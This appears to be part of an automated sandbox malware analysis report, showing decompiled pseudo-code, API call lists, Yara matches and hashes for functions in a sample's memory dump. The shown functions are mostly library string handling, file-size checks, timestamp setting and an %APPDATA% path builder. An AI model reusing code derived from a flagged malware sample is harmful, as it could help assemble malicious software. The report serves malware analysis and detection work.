                                                                    0x0041c2b2
                                                                    0x0041c2b5
                                                                    0x0041c2be
                                                                    0x0041c2c0
                                                                    0x0041c2c0
                                                                    0x0041c2c6
                                                                    0x0041c2ca
                                                                    0x0041c2d8
                                                                    0x0041c2de
                                                                    0x0041c2e1
                                                                    0x0041c2e7
                                                                    0x0041c2ea
                                                                    0x0041c2f5
                                                                    0x0041c2fa
                                                                    0x0041c2fd
                                                                    0x0041c300
                                                                    0x0041c307
                                                                    0x0041c309
                                                                    0x0041c30c
                                                                    0x0041c31b
                                                                    0x0041c321
                                                                    0x0041c324
                                                                    0x00000000
                                                                    0x0041c279
                                                                    0x0041c27e
                                                                    0x0041c284
                                                                    0x0041c294
                                                                    0x0041c29e
                                                                    0x0041c2a4
                                                                    0x0041c2a8
                                                                    0x0041c2ab
                                                                    0x0041c2ab
                                                                    0x0041c2ab
                                                                    0x0041c294
                                                                    0x0041c277
                                                                    0x0041c33b

                                                                    APIs
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000001,00000000,00000000,?,?,?,0041C7FC,?,?,?,00000000,00000104,00000000), ref: 0041C26E
                                                                    • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,0041C7FC,?,?,?,00000000,00000104), ref: 0041C29E
                                                                    • GetLocalTime.KERNEL32(?,?,?,?,0041C7FC,?,?,?,00000000,00000104,00000000), ref: 0041C2CA
                                                                    • SystemTimeToFileTime.KERNEL32(?,?,?,?,?,0041C7FC,?,?,?,00000000,00000104,00000000), ref: 0041C2D8
                                                                      • Part of subcall function 0041BDB5: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041BDE3
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: File$Time$Pointer$HandleInformationLocalSystem
                                                                    • String ID:
                                                                    • API String ID: 3986731826-0
                                                                    • Opcode ID: 31c3b757d30fce1f0dd3530f2d07acd6675b560af08c580c3f67bc801e869bdf
                                                                    • Instruction ID: c47d1c74b6fe0dbb013d994ab2cf3d48cd5b4d7b07a9299f2b236cd2f0fe87bf
                                                                    • Opcode Fuzzy Hash: 31c3b757d30fce1f0dd3530f2d07acd6675b560af08c580c3f67bc801e869bdf
                                                                    • Instruction Fuzzy Hash: D8414C719002499FCF15DFA9C880ADEBBF8FF49310F1441AAE854EB256D3349985CB65
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00431057 Relevance: 6.0, APIs: 4, Instructions: 49COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E00431057(void* __ebx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24, intOrPtr _a28) {
				intOrPtr _t25;
				void* _t26;

				_t25 = _a16;
				if(_t25 == 0x65 || _t25 == 0x45) {
					_t26 = E00430949(__eflags, _a4, _a8, _a12, _a20, _a24, _a28);
					goto L9;
				} else {
					_t35 = _t25 - 0x66;
					if(_t25 != 0x66) {
						__eflags = _t25 - 0x61;
						if(_t25 == 0x61) {
							L7:
							_t26 = E00430A30(_a4, _a8, _a12, _a20, _a24, _a28);
						} else {
							__eflags = _t25 - 0x41;
							if(__eflags == 0) {
								goto L7;
							} else {
								_t26 = E00430F6A(__ebx, __edx, __eflags, _a4, _a8, _a12, _a20, _a24, _a28);
							}
						}
						L9:
						return _t26;
					} else {
						return E00430EA9(__ebx, __edx, _t35, _a4, _a8, _a12, _a20, _a28);
					}
				}
			}





                                                                    0x0043105c
                                                                    0x00431062
                                                                    0x004310d5
                                                                    0x00000000
                                                                    0x00431069
                                                                    0x00431069
                                                                    0x0043106c
                                                                    0x00431087
                                                                    0x0043108a
                                                                    0x004310aa
                                                                    0x004310bc
                                                                    0x0043108c
                                                                    0x0043108c
                                                                    0x0043108f
                                                                    0x00000000
                                                                    0x00431091
                                                                    0x004310a3
                                                                    0x004310a3
                                                                    0x0043108f
                                                                    0x004310da
                                                                    0x004310de
                                                                    0x0043106e
                                                                    0x00431086
                                                                    0x00431086
                                                                    0x0043106c

                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                    • String ID:
                                                                    • API String ID: 3016257755-0
                                                                    • Opcode ID: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                    • Instruction ID: 8501afd68e82aa54c8f7bb2d103e32ce36438d8cb66e749964dcea4e0054fcca
                                                                    • Opcode Fuzzy Hash: 4bdea013960d862e58fdc3211a87ed6cb7384f6b6b2695c697ae8ee222476223
                                                                    • Instruction Fuzzy Hash: 73117E3200018AFBCF265E85CC51CEE3F72BF1C354F18A51AFA1859531C23AC9B2AB85
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00415E43 Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 38stringCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 58%
                                                                    			E00415E43(char* __eax, char* _a4) {
				intOrPtr _v8;
				intOrPtr* _v12;
				intOrPtr* _t10;
				char* _t14;
				CHAR* _t15;
				intOrPtr _t16;
				void* _t17;
				void* _t19;
				void* _t20;
				char* _t22;

				_t22 = __eax;
				_t14 = StrStrA(__eax, _a4);
				if(_t14 != 0) {
					_t19 = _t14 - _t22;
					_t22 = 0x446738;
					 *0x4463a0(0x446738, _t22, _t19, _t17);
					_t10 = _v12;
					_t3 = _t19 + 0x446738; // 0x446738
					_t15 = _t3;
					 *_t15 = 0;
					_t20 = _t10 + 1;
					do {
						_t16 =  *_t10;
						_t10 = _t10 + 1;
					} while (_t16 != 0);
					wsprintfA(_t15, "%s%s", _v8, _t10 - _t20 + _t14);
				}
				return _t22;
			}













                                                                    0x00415e49
                                                                    0x00415e52
                                                                    0x00415e56
                                                                    0x00415e5b
                                                                    0x00415e5f
                                                                    0x00415e65
                                                                    0x00415e6b
                                                                    0x00415e6f
                                                                    0x00415e6f
                                                                    0x00415e75
                                                                    0x00415e78
                                                                    0x00415e7b
                                                                    0x00415e7b
                                                                    0x00415e7d
                                                                    0x00415e7e
                                                                    0x00415e91
                                                                    0x00415e9a
                                                                    0x00415e9f

                                                                    APIs
                                                                    • StrStrA.SHLWAPI(?,?,?,00000000,00409BA1,%APPDATA%,00000000), ref: 00415E4C
                                                                    • lstrcpyn.KERNEL32(00446738,?,00000000,?,?,?,?,00000000,00409BA1,%APPDATA%,00000000), ref: 00415E65
                                                                    • wsprintfA.USER32 ref: 00415E91
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: lstrcpynwsprintf
                                                                    • String ID: %s%s
                                                                    • API String ID: 1799455324-3252725368
                                                                    • Opcode ID: 393492f4549c9b792aa1224fcd533445a5958cbde6c9ff708e5fe85e06368ede
                                                                    • Instruction ID: d93e4b79ebd00485133b04a5dbc1bdd8682614b46f9de107ed7e5781d0f10841
                                                                    • Opcode Fuzzy Hash: 393492f4549c9b792aa1224fcd533445a5958cbde6c9ff708e5fe85e06368ede
                                                                    • Instruction Fuzzy Hash: 22F0F6352013126FDB115B288C88DD7BFADEF97255B050065F84083211CB768809C29A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00416388 Relevance: 6.0, APIs: 4, Instructions: 34fileCOMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 30%
                                                                    			E00416388(void* __ecx, CHAR* _a4) {
				void* _v8;
				char _v12;
				void* _t7;
				intOrPtr _t9;
				void* _t15;

				_t15 = CreateFileA(_a4, 0x80000000, 3, 0, 3, 0x80, 0);
				if(_t15 != 0xffffffff) {
					_t7 =  *0x446274(_t15,  &_v12);
					_push(_t15);
					if(_t7 != 0) {
						CloseHandle();
						_t9 = _v12;
					} else {
						CloseHandle();
						goto L1;
					}
				} else {
					L1:
					_t9 = 0;
				}
				return _t9;
			}








                                                                    0x004163a9
                                                                    0x004163ae
                                                                    0x004163bb
                                                                    0x004163c1
                                                                    0x004163c4
                                                                    0x004163ce
                                                                    0x004163d4
                                                                    0x004163c6
                                                                    0x004163c6
                                                                    0x00000000
                                                                    0x004163c6
                                                                    0x004163b0
                                                                    0x004163b0
                                                                    0x004163b0
                                                                    0x004163b2
                                                                    0x004163dc

                                                                    APIs
                                                                    • CreateFileA.KERNEL32(00409915,80000000,00000003,00000000,00000003,00000080,00000000,00000000,?,?,?,00409915,?), ref: 004163A3
                                                                    • GetFileSizeEx.KERNEL32(00000000,00409915,?,?,?,00409915,?), ref: 004163BB
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00409915,?), ref: 004163C6
                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,00409915,?), ref: 004163CE
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: CloseFileHandle$CreateSize
                                                                    • String ID:
                                                                    • API String ID: 4148174661-0
                                                                    • Opcode ID: 58dfb90a7643de4ec8f2a8ba50af8c166801039d5656cc922925295c48f3c977
                                                                    • Instruction ID: 4d933e429bde8ac1ac14d593430ac78cd44df0d66b26a74b996ace1fb338f76d
                                                                    • Opcode Fuzzy Hash: 58dfb90a7643de4ec8f2a8ba50af8c166801039d5656cc922925295c48f3c977
                                                                    • Instruction Fuzzy Hash: E1F08239601218FBE710AB60DC09FDF7A6CFB06750F124261FE11A21D0D7B0AA41966E
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040440A Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 65COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040440A(intOrPtr* __ecx, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				void* __ebx;
				void* __edi;
				void* __ebp;
				intOrPtr _t13;
				intOrPtr* _t17;
				intOrPtr* _t20;
				intOrPtr* _t23;
				intOrPtr _t25;
				intOrPtr* _t27;
				intOrPtr _t31;
				intOrPtr* _t34;
				void* _t35;

				_t23 = _a4;
				_t13 =  *((intOrPtr*)(_t23 + 0x10));
				_t34 = __ecx;
				_t25 = _a8;
				if(_t13 < _t25) {
					_t13 = E0041CFED("invalid string position");
				}
				_t31 = _t13 - _t25;
				if(_a12 < _t31) {
					_t31 = _a12;
				}
				if(_t34 != _t23) {
					if(E004044A3(_t23, _t34, _t31, _t35, _t31, 0) != 0) {
						if( *((intOrPtr*)(_t23 + 0x14)) < 0x10) {
							_t17 = _t23;
						} else {
							_t17 =  *_t23;
						}
						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
							_t27 = _t34;
						} else {
							_t27 =  *_t34;
						}
						E00420090(_t27, _t17 + _a8, _t31);
						 *((intOrPtr*)(_t34 + 0x10)) = _t31;
						if( *((intOrPtr*)(_t34 + 0x14)) < 0x10) {
							_t20 = _t34;
						} else {
							_t20 =  *_t34;
						}
						 *((char*)(_t20 + _t31)) = 0;
					}
				} else {
					E0040453E(_t34, _t31 + _t25, 0xffffffff);
					E0040453E(_t34, 0, _a8);
				}
				return _t34;
			}















                                                                    0x0040440e
                                                                    0x00404411
                                                                    0x00404415
                                                                    0x00404417
                                                                    0x0040441d
                                                                    0x00404424
                                                                    0x00404424
                                                                    0x0040442b
                                                                    0x00404430
                                                                    0x00404432
                                                                    0x00404432
                                                                    0x00404437
                                                                    0x0040445f
                                                                    0x00404465
                                                                    0x0040446b
                                                                    0x00404467
                                                                    0x00404467
                                                                    0x00404467
                                                                    0x00404471
                                                                    0x00404477
                                                                    0x00404473
                                                                    0x00404473
                                                                    0x00404473
                                                                    0x0040447f
                                                                    0x0040448b
                                                                    0x0040448e
                                                                    0x00404494
                                                                    0x00404490
                                                                    0x00404490
                                                                    0x00404490
                                                                    0x00404496
                                                                    0x00404496
                                                                    0x00404439
                                                                    0x00404440
                                                                    0x0040444c
                                                                    0x0040444c
                                                                    0x004044a0

                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00404424
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                      • Part of subcall function 004044A3: std::_Xinvalid_argument.LIBCPMT ref: 004044B2
                                                                    • _memmove.LIBCMT ref: 0040447F
                                                                    Strings
                                                                    • invalid string position, xrefs: 0040441F
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                    • String ID: invalid string position
                                                                    • API String ID: 3404309857-1799206989
                                                                    • Opcode ID: c84d20c9b8642d089f61c3007de59df56a6136ab1d1563934e22eb90509181ac
                                                                    • Instruction ID: 71b88961af2b5fc5f2eec8d3aeff62b16637d08c462ab68e2fe6546011dd54b6
                                                                    • Opcode Fuzzy Hash: c84d20c9b8642d089f61c3007de59df56a6136ab1d1563934e22eb90509181ac
                                                                    • Instruction Fuzzy Hash: 131108B1304210ABCB14DE599C41F2AB3A5EBC5715F10053FFA52A72C2D778DD01879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D3B5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 60COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040D3B5(intOrPtr* __eax, intOrPtr* __edi, signed int _a4, intOrPtr _a8) {
				void* __ebx;
				void* __esi;
				void* __ebp;
				signed int _t17;
				intOrPtr* _t21;
				intOrPtr* _t24;
				intOrPtr* _t29;
				void* _t30;
				intOrPtr* _t31;
				intOrPtr* _t36;
				intOrPtr _t38;
				intOrPtr _t39;

				_t36 = __edi;
				_t29 = __eax;
				_t17 = _a4;
				_t38 =  *((intOrPtr*)(__eax + 0x10));
				if(_t38 < _t17) {
					_t17 = E0041CFED("invalid string position");
				}
				_t39 = _t38 - _t17;
				if(_a8 < _t39) {
					_t39 = _a8;
				}
				if(_t36 != _t29) {
					if(E0040D4DE(_t29, _t36, _t39) != 0) {
						if( *((intOrPtr*)(_t29 + 0x14)) < 8) {
							_t21 = _t29;
						} else {
							_t21 =  *_t29;
						}
						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
							_t31 = _t36;
						} else {
							_t31 =  *_t36;
						}
						_t30 = _t39 + _t39;
						E00420090(_t31, _t21 + _a4 * 2, _t30);
						 *((intOrPtr*)(_t36 + 0x10)) = _t39;
						if( *((intOrPtr*)(_t36 + 0x14)) < 8) {
							_t24 = _t36;
						} else {
							_t24 =  *_t36;
						}
						 *((short*)(_t30 + _t24)) = 0;
					}
				} else {
					E0040D46D(_t17 | 0xffffffff, _t39 + _t17, _t36);
					E0040D46D(_a4, 0, _t36);
				}
				return _t36;
			}















                                                                    0x0040d3b5
                                                                    0x0040d3b9
                                                                    0x0040d3bb
                                                                    0x0040d3bf
                                                                    0x0040d3c4
                                                                    0x0040d3cb
                                                                    0x0040d3cb
                                                                    0x0040d3d0
                                                                    0x0040d3d5
                                                                    0x0040d3d7
                                                                    0x0040d3d7
                                                                    0x0040d3dc
                                                                    0x0040d400
                                                                    0x0040d406
                                                                    0x0040d40c
                                                                    0x0040d408
                                                                    0x0040d408
                                                                    0x0040d408
                                                                    0x0040d412
                                                                    0x0040d418
                                                                    0x0040d414
                                                                    0x0040d414
                                                                    0x0040d414
                                                                    0x0040d41d
                                                                    0x0040d426
                                                                    0x0040d432
                                                                    0x0040d435
                                                                    0x0040d43b
                                                                    0x0040d437
                                                                    0x0040d437
                                                                    0x0040d437
                                                                    0x0040d43f
                                                                    0x0040d43f
                                                                    0x0040d3de
                                                                    0x0040d3e6
                                                                    0x0040d3f0
                                                                    0x0040d3f0
                                                                    0x0040d448

                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040D3CB
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                      • Part of subcall function 0040D4DE: std::_Xinvalid_argument.LIBCPMT ref: 0040D4EB
                                                                    • _memmove.LIBCMT ref: 0040D426
                                                                    Strings
                                                                    • invalid string position, xrefs: 0040D3C6
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
                                                                    • String ID: invalid string position
                                                                    • API String ID: 3404309857-1799206989
                                                                    • Opcode ID: 51085be7a4a6b2cb6b4a84b2c01f0f5e9400d741291547f272db0d047e90bd40
                                                                    • Instruction ID: 39d03dba5bfe18f3b815d5de13de3abcdcc50f6a9039957bbc31f542dee680fa
                                                                    • Opcode Fuzzy Hash: 51085be7a4a6b2cb6b4a84b2c01f0f5e9400d741291547f272db0d047e90bd40
                                                                    • Instruction Fuzzy Hash: A0115131B04214DBCB14EEADD8C086973A5AF95324750453BF816EB2C1D738FD5ACB9A
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040C2E9 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040C2E9(signed int __eax, void* __ebx, void* __ebp, void* __eflags, intOrPtr _a4) {
				void* __edi;
				void* __esi;
				intOrPtr _t13;
				intOrPtr* _t16;
				intOrPtr* _t18;
				intOrPtr* _t19;
				void* _t22;
				signed int _t23;
				intOrPtr _t30;
				intOrPtr* _t32;
				void* _t33;

				_t33 = __ebp;
				_t22 = __ebx;
				_t29 = _a4;
				_t32 = __eax;
				_t23 = __eax;
				if(E00404505(__eax, _a4) == 0) {
					_t3 = _t32 + 0x10; // 0x14083
					_t13 =  *_t3;
					if((_t23 | 0xffffffff) - _t13 <= __ebx) {
						_t13 = E0041CFA0("string too long");
					}
					if(_t22 != 0) {
						_t30 = _t13 + _t22;
						if(E004044A3(_t22, _t32, _t30, _t33, _t30, 0) != 0) {
							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
								_t16 = _t32;
							} else {
								_t16 =  *_t32;
							}
							_t6 = _t32 + 0x10; // 0x14083
							E00420090( *_t6 + _t16, _a4, _t22);
							 *((intOrPtr*)(_t32 + 0x10)) = _t30;
							if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
								_t18 = _t32;
							} else {
								_t18 =  *_t32;
							}
							 *((char*)(_t18 + _t30)) = 0;
						}
					}
					return _t32;
				}
				if( *((intOrPtr*)(_t32 + 0x14)) < 0x10) {
					_t19 = _t32;
				} else {
					_t19 =  *_t32;
				}
				return E00404799(_t22, _t23, _t32, _t32, _t29 - _t19);
			}














                                                                    0x0040c2e9
                                                                    0x0040c2e9
                                                                    0x0040c2eb
                                                                    0x0040c2ef
                                                                    0x0040c2f2
                                                                    0x0040c2fb
                                                                    0x0040c316
                                                                    0x0040c316
                                                                    0x0040c320
                                                                    0x0040c327
                                                                    0x0040c327
                                                                    0x0040c32e
                                                                    0x0040c330
                                                                    0x0040c33f
                                                                    0x0040c345
                                                                    0x0040c34b
                                                                    0x0040c347
                                                                    0x0040c347
                                                                    0x0040c347
                                                                    0x0040c34d
                                                                    0x0040c358
                                                                    0x0040c364
                                                                    0x0040c367
                                                                    0x0040c36d
                                                                    0x0040c369
                                                                    0x0040c369
                                                                    0x0040c369
                                                                    0x0040c36f
                                                                    0x0040c36f
                                                                    0x0040c33f
                                                                    0x00000000
                                                                    0x0040c373
                                                                    0x0040c301
                                                                    0x0040c307
                                                                    0x0040c303
                                                                    0x0040c303
                                                                    0x0040c303
                                                                    0x00000000

                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: Xinvalid_argument_memmovestd::_
                                                                    • String ID: string too long
                                                                    • API String ID: 256744135-2556327735
                                                                    • Opcode ID: 4048561c59f235bc094e0d827abe63b21efa2ec50549c6101e3ab7b4f98de422
                                                                    • Instruction ID: e162f7baa55cd456ad8d6d03248c366c9d87632f5a447c05ac5f3b4133326794
                                                                    • Opcode Fuzzy Hash: 4048561c59f235bc094e0d827abe63b21efa2ec50549c6101e3ab7b4f98de422
                                                                    • Instruction Fuzzy Hash: FA11A771310710DBD6349F2D9881A2AB3E5DF82B04B104B3FF992A72C1D778DC05869D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 00416670 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 59COMMON
                                                                    Download Yara Rule
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: _malloc
                                                                    • String ID: image/jpeg
                                                                    • API String ID: 1579825452-3785015651
                                                                    • Opcode ID: 7903822f628e9fcc13ea499a69416d40267faf483abcf632134ad1f49bcadf9c
                                                                    • Instruction ID: 9deb9c53637fe15961d72f2e046ec25fc64e134807efa7d22ec6b11529159120
                                                                    • Opcode Fuzzy Hash: 7903822f628e9fcc13ea499a69416d40267faf483abcf632134ad1f49bcadf9c
                                                                    • Instruction Fuzzy Hash: 3611A1B2E00114FF8B11DFA5CD818CFBB79FE02360B22027BE911A21A0D776DE90D659
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040453E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 51COMMONLIBRARYCODE
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040453E(intOrPtr* __ecx, intOrPtr _a4, intOrPtr _a8) {
				intOrPtr _t9;
				intOrPtr _t10;
				intOrPtr _t15;
				intOrPtr _t17;
				intOrPtr _t20;
				intOrPtr* _t21;
				intOrPtr _t22;
				intOrPtr* _t23;
				intOrPtr* _t26;
				intOrPtr* _t30;

				_t30 = __ecx;
				_t9 =  *((intOrPtr*)(__ecx + 0x10));
				_t20 = _a4;
				if(_t9 < _t20) {
					_t9 = E0041CFED("invalid string position");
				}
				_t17 = _a8;
				_t10 = _t9 - _t20;
				if(_t10 < _t17) {
					_t17 = _t10;
				}
				if(_t17 != 0) {
					_t22 =  *((intOrPtr*)(_t30 + 0x14));
					if(_t22 < 0x10) {
						_t26 = _t30;
					} else {
						_t26 =  *_t30;
					}
					if(_t22 < 0x10) {
						_t23 = _t30;
					} else {
						_t23 =  *_t30;
					}
					E0041DCF0(_t23 + _t20, _t26 + _t20 + _t17, _t10 - _t17);
					_t15 =  *((intOrPtr*)(_t30 + 0x10)) - _t17;
					 *((intOrPtr*)(_t30 + 0x10)) = _t15;
					if( *((intOrPtr*)(_t30 + 0x14)) < 0x10) {
						_t21 = _t30;
					} else {
						_t21 =  *_t30;
					}
					 *((char*)(_t21 + _t15)) = 0;
				}
				return _t30;
			}













                                                                    0x0040453f
                                                                    0x00404541
                                                                    0x00404544
                                                                    0x0040454a
                                                                    0x00404551
                                                                    0x00404551
                                                                    0x00404557
                                                                    0x0040455b
                                                                    0x0040455f
                                                                    0x00404561
                                                                    0x00404561
                                                                    0x00404565
                                                                    0x00404567
                                                                    0x0040456e
                                                                    0x00404574
                                                                    0x00404570
                                                                    0x00404570
                                                                    0x00404570
                                                                    0x00404579
                                                                    0x0040457f
                                                                    0x0040457b
                                                                    0x0040457b
                                                                    0x0040457b
                                                                    0x0040458c
                                                                    0x00404597
                                                                    0x0040459d
                                                                    0x004045a1
                                                                    0x004045a7
                                                                    0x004045a3
                                                                    0x004045a3
                                                                    0x004045a3
                                                                    0x004045a9
                                                                    0x004045a9
                                                                    0x004045b1

                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 00404551
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
                                                                      • Part of subcall function 0041CFED: __CxxThrowException@8.LIBCMT ref: 0041D017
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D028
                                                                    • _memmove.LIBCMT ref: 0040458C
                                                                    Strings
                                                                    • invalid string position, xrefs: 0040454C
                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.593774226.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_400000_cvtres.jbxd
                                                                    Yara matches
                                                                    Similarity
                                                                    • API ID: std::exception::exception$Exception@8ThrowXinvalid_argument_memmovestd::_
                                                                    • String ID: invalid string position
                                                                    • API String ID: 1785806476-1799206989
                                                                    • Opcode ID: 37caa54bd28c21300105505d187711df10a1c724f58efbc90191239339e49f73
                                                                    • Instruction ID: 22196df5fd703f2689d0317eea6ea5b30810e9d64783d7f03cd132f7c48a3960
                                                                    • Opcode Fuzzy Hash: 37caa54bd28c21300105505d187711df10a1c724f58efbc90191239339e49f73
                                                                    • Instruction Fuzzy Hash: 9D01B5B17042519BC724DD2C9DC081BB3A6ABC57107204D3ED781D76C5DB78EC46879D
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Function 0040D46D Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMON
                                                                    Download Yara Rule
                                                                    C-Code - Quality: 100%
                                                                    			E0040D46D(void* __eax, signed int __ecx, intOrPtr* __esi) {
				intOrPtr _t14;
				void* _t15;
				signed int _t24;
				intOrPtr* _t26;
				signed int _t28;
				intOrPtr* _t29;
				intOrPtr _t30;
				intOrPtr* _t31;
				void* _t33;
				intOrPtr* _t34;

				_t34 = __esi;
				_t28 = __ecx;
				_t33 = __eax;
				_t14 =  *((intOrPtr*)(__esi + 0x10));
				if(_t14 < __ecx) {
					_t14 = E0041CFED("invalid string position");
				}
				_t15 = _t14 - _t28;
				if(_t15 < _t33) {
					_t33 = _t15;
				}
				if(_t33 != 0) {
					_t30 =  *((intOrPtr*)(_t34 + 0x14));
					if(_t30 < 8) {
						_t26 = _t34;
					} else {
						_t26 =  *_t34;
					}
					if(_t30 < 8) {
						_t31 = _t34;
					} else {
						_t31 =  *_t34;
					}
					E0041DCF0(_t31 + _t28 * 2, _t26 + (_t28 + _t33) * 2, _t15 - _t33 + _t15 - _t33);
					_t24 =  *(_t34 + 0x10) - _t33;
					 *(_t34 + 0x10) = _t24;
					if( *((intOrPtr*)(_t34 + 0x14)) < 8) {
						_t29 = _t34;
					} else {
						_t29 =  *_t34;
					}
					 *((short*)(_t29 + _t24 * 2)) = 0;
				}
				return _t34;
			}













                                                                    0x0040d46d
                                                                    0x0040d46d
                                                                    0x0040d46e
                                                                    0x0040d470
                                                                    0x0040d475
                                                                    0x0040d47c
                                                                    0x0040d47c
                                                                    0x0040d481
                                                                    0x0040d485
                                                                    0x0040d487
                                                                    0x0040d487
                                                                    0x0040d48b
                                                                    0x0040d48d
                                                                    0x0040d494
                                                                    0x0040d49a
                                                                    0x0040d496
                                                                    0x0040d496
                                                                    0x0040d496
                                                                    0x0040d49f
                                                                    0x0040d4a5
                                                                    0x0040d4a1
                                                                    0x0040d4a1
                                                                    0x0040d4a1
                                                                    0x0040d4b7
                                                                    0x0040d4c2
                                                                    0x0040d4c8
                                                                    0x0040d4cc
                                                                    0x0040d4d2
                                                                    0x0040d4ce
                                                                    0x0040d4ce
                                                                    0x0040d4ce
                                                                    0x0040d4d6
                                                                    0x0040d4d6
                                                                    0x0040d4dd

                                                                    APIs
                                                                    • std::_Xinvalid_argument.LIBCPMT ref: 0040D47C
                                                                      • Part of subcall function 0041CFED: std::exception::exception.LIBCMT ref: 0041D002
